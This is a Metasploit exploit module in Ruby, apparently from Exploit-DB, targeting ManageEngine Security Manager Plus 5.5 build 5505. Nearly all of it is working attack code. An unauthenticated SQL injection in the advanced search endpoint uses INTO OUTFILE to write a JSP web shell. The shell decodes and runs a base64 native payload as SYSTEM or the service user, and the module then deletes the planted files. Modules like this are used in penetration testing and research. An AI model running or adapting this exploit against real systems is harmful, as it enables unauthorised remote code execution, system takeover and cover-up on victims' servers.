ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE

	def initialize(info={})
		super(update_info(info,
			'Name'           => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
			'Description'    => %q{
					This module exploits a SQL injection found in ManageEngine Security Manager Plus
				advanced search page, which results in remote code execution under the context of
				SYSTEM in Windows; or as the user in Linux.  Authentication is not required in order
				to exploit this vulnerability.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'xistence <xistence[at]0x90.nl>',  # Discovery & Metasploit module
					'sinn3r',                          # Improved Metasploit module
					'egypt'                            # Improved Metasploit module
				],
			'References'     =>
				[
					['EDB','22094'],
					['BID', '56138']
				],
			'Platform'       => ['win', 'linux'],
			'Targets'        =>
				[
					['Automatic', {}],
					['Windows',   { 'Arch' => ARCH_X86, 'Platform' => 'win'   }],
					['Linux',     { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
				],
			'DefaultTarget'  => 0,
			'Privileged'     => false,
			'DisclosureDate' => "Oct 18 2012"))

		register_options(
			[
				OptPort.new('RPORT', [true, 'The target port', 6262])
			], self.class)
	end


	def check
		res = sqli_exec(Rex::Text.rand_text_alpha(1))

		if res and res.body =~ /Error during search/
			return Exploit::CheckCode::Appears
		else
			return Exploit::CheckCode::Safe
		end
	end


	def pick_target
		return target if target.name != 'Automatic'

		rnd_num   = Rex::Text.rand_text_numeric(1)
		rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt"
		outpath   = "../../webapps/SecurityManager/#{rnd_fname}"

		@clean_ups << outpath

		sqli  = "#{rnd_num})) union select @@version,"
		sqli << (2..28).map {|e| e} * ","
		sqli << " into outfile \"#{outpath}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
		sqli_exec(sqli)

		res = send_request_raw({'uri'=>"/#{rnd_fname}"})

		# What @@version returns:
		# Linux   = 5.0.36-enterprise
		# Windows = 5.0.36-enterprise-nt

		if res and res.body =~ /\d\.\d\.\d\d\-enterprise\-nt/
			print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}")
			return targets[1]  # Windows target
		elsif res and res.body =~ /\d\.\d\.\d\d\-enterprise/
			print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}")
			return targets[2]
		end

		return nil
	end


	#
	# We're in SecurityManager/bin at this point
	#
	def on_new_session(cli)
		if target['Platform'] == 'linux'
			print_warning("Malicious executable is removed during payload execution")
		end

		if cli.type == 'meterpreter'
			cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
		end

		@clean_ups.each { |f|
			base = File.basename(f)
			f = "../webapps/SecurityManager/#{base}"
			print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"")

			begin
				if cli.type == 'meterpreter'
					cli.fs.file.rm(f)
				else
					del_cmd = (@my_target['Platform'] == 'linux') ? 'rm' : 'del'
					f = f.gsub(/\//, '\\') if @my_target['Platform'] == 'win'
					cli.shell_command_token("#{del_cmd} \"#{f}\"")
				end

				print_good("#{rhost}:#{rport} - \"#{base}\" deleted")
			rescue ::Exception => e
				print_error("Unable to delete: #{e.message}")
			end
		}
	end


	#
	# Embeds our executable in JSP
	#
	def generate_jsp_payload
		opts                = {:arch => @my_target.arch, :platform => @my_target.platform}
		native_payload      = Rex::Text.encode_base64(generate_payload_exe(opts))
		native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3)
		ext                 = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'

		var_raw     = Rex::Text.rand_text_alpha(rand(8) + 3)
		var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
		var_buf     = Rex::Text.rand_text_alpha(rand(8) + 3)
		var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
		var_tmp     = Rex::Text.rand_text_alpha(rand(8) + 3)
		var_path    = Rex::Text.rand_text_alpha(rand(8) + 3)
		var_proc2   = Rex::Text.rand_text_alpha(rand(8) + 3)

		if @my_target['Platform'] == 'linux'
			var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
			chmod = %Q|
			Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
			Thread.sleep(200);
			|

			var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
			cleanup = %Q|
			Thread.sleep(200);
			Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
			|
		else
			chmod   = ''
			cleanup = ''
		end

		jsp = %Q|
		<%@page import="java.io.*"%>
		<%@page import="sun.misc.BASE64Decoder"%>

		<%
		byte[] #{var_raw} = null;
		BufferedOutputStream #{var_ostream} = null;
		try {
			String #{var_buf} = "#{native_payload}";

			BASE64Decoder #{var_decoder} = new BASE64Decoder();
			#{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

			File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
			String #{var_path} = #{var_tmp}.getAbsolutePath();

			#{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
			#{var_ostream}.write(#{var_raw});
			#{var_ostream}.close();
			#{chmod}
			Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
			#{cleanup}
		} catch (Exception e) {
		}
		%>
		|

		jsp = jsp.gsub(/\n/, '')
		jsp = jsp.gsub(/\t/, '')

		jsp.unpack("H*")[0]
	end

	def sqli_exec(sqli_string)
		cookie  = 'STATE_COOKIE=&'
		cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
		cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
		cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&'
		cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&'
		cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&'
		cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&'
		cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; '
		cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
		cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'

		state_id = Rex::Text.rand_text_numeric(5)

		send_request_cgi({
			'method'    => 'POST',
			'uri'       => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp",
			'headers'   => {
				'Cookie' => cookie,
				'Accept-Encoding' => 'identity'
			},
			'vars_get'  => {
				'reqType'    =>'AdvanceSearch',
				'SUBREQUEST' =>'XMLHTTP'
			},
			'vars_post' => {
				'ANDOR'       => 'and',
				'condition_1' => 'OpenPorts@PORT',
				'operator_1'  => 'IN',
				'value_1'     => sqli_string,
				'COUNT'       => '1'
			}
		})
	end

	#
	# Run the actual exploit
	#
	def inject_exec(out)
		hex_jsp = generate_jsp_payload
		rnd_num = Rex::Text.rand_text_numeric(1)
		sqli  = "#{rnd_num})) union select 0x#{hex_jsp},"
		sqli << (2..28).map {|e| e} * ","
		sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"

		print_status("#{rhost}:#{rport} - Trying SQL injection...")
		sqli_exec(sqli)

		fname = "/#{File.basename(out)}"
		print_status("#{rhost}:#{rport} - Requesting #{fname}")
		send_request_raw({'uri' => fname})

		handler
	end


	def exploit
		# This is used to collect files we want to delete later
		@clean_ups = []

		@my_target = pick_target
		if @my_target.nil?
			print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
			return
		end

		jsp_name  = rand_text_alpha(rand(6)+3)
		outpath   = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}"

		@clean_ups << outpath

		inject_exec(outpath)
	end
end